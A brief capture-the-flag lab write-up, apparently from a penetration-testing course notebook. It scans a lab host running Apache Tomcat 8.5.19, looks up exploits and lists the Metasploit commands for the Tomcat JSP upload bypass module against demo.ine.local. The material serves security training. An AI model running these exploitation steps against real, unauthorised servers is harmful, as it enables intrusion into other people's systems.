Windows: Java Web Server

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable java web server will be accessible at demo.ine.local.

Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.

Objective: Exploit the application and retrieve the flag!

Tools

The best tools for this lab are:

Nmap
Metasploit Framework
Firefox

Writeup

nmap -sSVC demo.ine.local

searchsploit Apache Tomcat 8.5.19

msfconsole
search JSP Upload Bypass

use exploit/multi/http/tomcat_jsp_upload_bypass
set rhosts demo.ine.local
run

PreviousHost & Network Penetration Testing: The Metasploit Framework (MSF)NextWindows: HTTP File Server

Last updated 5 months ago